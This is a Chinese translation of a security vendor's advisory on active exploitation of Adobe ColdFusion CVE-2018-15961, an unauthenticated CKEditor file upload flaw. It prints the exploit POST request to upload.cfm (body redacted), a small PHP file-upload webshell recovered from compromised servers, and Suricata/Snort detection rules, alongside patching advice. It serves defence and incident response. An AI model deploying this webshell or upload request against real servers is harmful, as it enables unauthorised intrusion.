CVE-2018-15961在野利用

栏目: 编程工具 · 发布时间: 6年前

内容简介:如果你的企业运行着ColdFusion网络版,那么你可能需要检查一下你的服务器了。Volexity研究人员近期发现Adobe ColdFusion CVE-2018-15961的漏洞利用。Adobe已经发布了该漏洞的补丁,并且没有公布该漏洞的详情和PoC。Volexity检测到的攻击活动中,中国某APT组织直接上传了中国菜刀webshell来入侵有漏洞的ColdFusion服务器。因为目标服务器没有升级adobe发布的更新补丁。该漏洞CVE编号为CVE-2018-15961,影响版本包括ColdFusio

如果你的企业运行着ColdFusion网络版,那么你可能需要检查一下你的服务器了。Volexity研究人员近期发现Adobe ColdFusion CVE-2018-15961的漏洞利用。Adobe已经发布了该漏洞的补丁,并且没有公布该漏洞的详情和PoC。

Volexity检测到的攻击活动中,中国某APT组织直接上传了中国菜刀webshell来入侵有漏洞的ColdFusion服务器。因为目标服务器没有升级adobe发布的更新补丁。该漏洞CVE编号为CVE-2018-15961,影响版本包括ColdFusion 11、ColdFusion 2016、ColdFusion 2018等4年内发布的所有版本。

Adobe的ColdFusion web应用开发平台一直是APT组织攻击的目标。主流的ColdFusion包括WYSIWYG 富文本编辑器CKEditor。在过去的ColdFusion版本中,Adobe打包了原来的FCKeditor。Adobe在决定用FCKeditor替代CKEditor时,意外引入了一个新的非认证文件上传漏洞。该漏洞与2009年发现的FCKeditor非认证文件上传漏洞非常类似。

APT组织利用CVE-2018-15961漏洞

Volexity在Adobe发布该漏洞安全更新后约2周发现了该漏洞的在野利用。 可以通过一个简单的HTTP POST请求到upload.cfm文件进行利用,upload.cfm是没有限制的,也不需要任何的认证。下面是解释该漏洞利用的POST请求:

POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm?action=upload HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: multipart/form-data; boundary=—————————5b12d3a3190134
Accept-Encoding: gzip, deflate
Content-Length: 9308
Host: <hostname>
Pragma: no-cache
Connection: close
—————————–5b12d3a3190134
<redacted>

Volexity发现APT组织利用来漏洞来上传JSP版本的中国菜刀,并在允许通过CKEditor上传前在受感染的web服务器上执行命令。相关的配置文件settings.cfm如下所示:

<cfset settings.disfiles = “cfc,exe,php,asp,cfm,cfml”>

CVE-2018-15961利用

在识别APT利用CVE-2018-15961后,Volexity检查了许多有网络连接的ColdFusion web服务器。这些服务器隶属于不同的组织,包括教育机构、州政府、医疗研究机构等。这些站点都有尝试webshell上传的痕迹。Volexity不能确认这些实例中是否有漏洞被滥用的情况。但是基于受感染的服务器上的文件,研究人员相信有非APT组织成员的用户在9月11日前已经识别了该漏洞。被入侵的网站上都有以下两个目录之一:

  • /cf_scripts/

  • /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/

大多数攻击实例中,这些文件的最后修改日期为6月2日或6月6日。许多网站上都有增加up.php.fla文件失败的遗留代码。.fla扩展并不常用,可能是因为攻击者没有发现.jsp文件扩展是允许上传的。

<?php
$files = @$_FILES[“files”];
if ($files[“name”] != ”) {
$fullpath = $_REQUEST[“path”] . $files[“name”];
if (move_uploaded_file($files[‘tmp_name’], $fullpath)) {
echo “<h1><a href=’$fullpath’>OK-Click here!</a></h1>”;
}
}echo ‘<html><head><title>Upload files…</title></head><body><form method=POST enctype=”multipart/form-data” action=””><input type=text name=path><input type=”file” name=”files”><input type=submit value=”Up”></form></body></html>’;
?>

许多受影响的网站都含有一个来自黑客组织TYPICAL IDIOT SECURITY的HTML index文件。网页内容如下:

Hacked by AnoaGhost – Typical Idiot Security
#together laugh in ur security since 2k17#
We are:~•Khunerable – SPEEDY-03 – PYS404 – Mirav – Grac3 – AnoaGhost – Jje Incovers – Panataran – magelangGetar – Kersen.id•

该黑客组织好像来自印度尼西亚,其成员AnoaGhost与支持ISIS的黑客组织有关联。

签名

以下入侵检测系统签名可以用于检测CVE-2018-15961滥用:

Suricata:
alert http $EXTERNAL_NET any -> $HOME_NET any (msg:”Volex – ColdFusion Unauthenticated Upload Attempt (upload.cfm)”; flow:to_server,established; content:”POST”; http_method; content:”upload.cfm?action=upload”; nocase; http_uri; sid:2018093003;)
Snort:
alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:”Volex – ColdFusion Unauthenticated Upload Attempt (upload.cfm)”; flow:to_server,established; content:”POST”; http_method; content:”upload.cfm?action=upload”; nocase; http_uri; sid:2018093003;)

建议

如果你的ColdFusion服务器有网络连接,那么可以检查一下日志文件和目录看是否有可疑文件。如果发现了可以的日志记录或文件,需要进行进一步的分析。

Volexity建议用户尽早更新Adobe ColdFusion补丁。最好的办法是在管理员面包中配置补丁升级。下图是Server Update > Updates > Settings的默认设置:

CVE-2018-15961在野利用

Volexity建议对配置进行如下修改:

  • 开启Automatically      Check for Updates(自动更新)选项

  • 将Check for      updates every 10 days(检查更新的时间)从10天修改为1天,这样每天都会检查更新

  • 配置正确的email,以接收安全更新通知。

Volexity同时建议所有ColdFusion管理员的访问限制为IP白名单,以减小攻击面。

总结

Adobe ColdFusion存在远程利用漏洞已经很长时间了,也是国家级攻击者非常喜欢的目标。补丁管理是预防此类攻击的非常有效的办法。但Volexity建议用户检查使用的版本并尽快更新到最新版。

https://www.volexity.com/blog/2018/11/08/active-exploitation-of-newly-patched-coldfusion-vulnerability-cve-2018-15961/


以上所述就是小编给大家介绍的《CVE-2018-15961在野利用》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

Producter 让产品从0到1

Producter 让产品从0到1

周楷雯 / 人民邮电出版社 / 2016-12-25 / CNY 69.00

这是一本以App Store首页推荐的成功App为例阐述如何完成一款App产品的设计、开发和营销的书。在这本书之后,作者的《一炷香》和《字里行间》两款产品也接连被App Store首页推荐。 《Producter 让产品从0到1》从产品的设计、产品的实现、产品的迭代、产品的营销、产品的进阶等几个角度,全面讲解了产品设计的基本原则、设计的重要性、设计的感觉、实用的设计工具、简单的iOS开发、产......一起来看看 《Producter 让产品从0到1》 这本书的介绍吧!

在线进制转换器
在线进制转换器

各进制数互转换器

html转js在线工具
html转js在线工具

html转js在线工具